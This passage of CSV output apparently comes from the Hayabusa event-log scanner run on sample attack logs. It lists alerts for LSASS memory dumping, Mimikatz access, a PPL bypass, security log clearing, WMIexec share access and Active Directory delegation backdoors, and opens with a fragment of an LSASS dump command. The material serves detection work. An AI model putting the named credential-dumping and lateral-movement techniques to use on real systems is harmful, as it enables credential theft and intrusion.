lsass lsass.dmp",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:26.081 +09:00,MSEDGEWIN10,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:26.081 +09:00,MSEDGEWIN10,1,high,LSASS Memory Dumping,,rules/sigma/process_creation/win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,11,high,CreateMiniDump Hacktool,,rules/sigma/file_event/file_event_hktl_createminidump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,11,high,LSASS Process Memory Dump Files,,rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,11,high,LSASS Memory Dump File Creation,,rules/sigma/file_event/sysmon_lsass_memory_dump_file_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,10,high,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,10,high,Mimikatz Detection LSASS Access,,rules/sigma/deprecated/sysmon_mimikatz_detection_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential 
Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:35.165 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:35.165 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:35.284 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:35.284 +09:00,MSEDGEWIN10,1,high,Suspicious Svchost Process,,rules/sigma/process_creation/win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:35.284 +09:00,MSEDGEWIN10,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-26 17:25:31.043 +09:00,srvdefender01.offsec.lan,1102,high,Security log was cleared,User: 
admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:36.560 +09:00,srvdefender01.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x4da321f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:36.560 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 47020 : LogonID: 0x4da321f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:36.584 +09:00,srvdefender01.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x4da324f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:36.584 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 34114 : LogonID: 0x4da324f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:36.686 +09:00,srvdefender01.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x4da3273,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB 
(GLOBAL).evtx" +2021-04-26 17:25:36.686 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 57116 : LogonID: 0x4da3273,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:36.852 +09:00,srvdefender01.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x4da3292,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:36.852 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 57116 : LogonID: 0x4da3292,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:36.913 +09:00,srvdefender01.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x4da32af,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:36.913 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 57116 : LogonID: 0x4da32af,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.308 +09:00,srvdefender01.offsec.lan,4674,low,Lateral Movement Indicator 
ConDrv,,rules/sigma/builtin/security/win_lateral_movement_condrv.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.313 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.325 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.329 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.332 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.335 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: 
\??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.338 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.342 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.344 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.348 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.350 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: 
admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.354 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.356 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.360 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.363 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.367 
+09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.369 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.373 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.375 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.379 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB 
(GLOBAL).evtx" +2021-04-26 17:25:37.381 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.385 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.385 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.388 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.391 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 
10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.392 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.392 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.394 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.399 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:38.406 
+09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:38.409 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:38.418 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:38.420 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:38.441 +09:00,srvdefender01.offsec.lan,4674,low,Lateral Movement Indicator ConDrv,,rules/sigma/builtin/security/win_lateral_movement_condrv.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:38.450 +09:00,srvdefender01.offsec.lan,5140,informational,Network 
Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:38.452 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:38.456 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:38.458 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:38.462 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:38.463 
+09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:38.463 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:38.464 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:38.479 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:38.481 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 
10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 18:07:00.330 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" +2021-04-26 18:07:00.330 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" +2021-04-26 18:07:00.331 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" +2021-04-26 18:07:00.331 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" +2021-04-26 18:07:00.331 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" +2021-04-26 18:07:00.331 
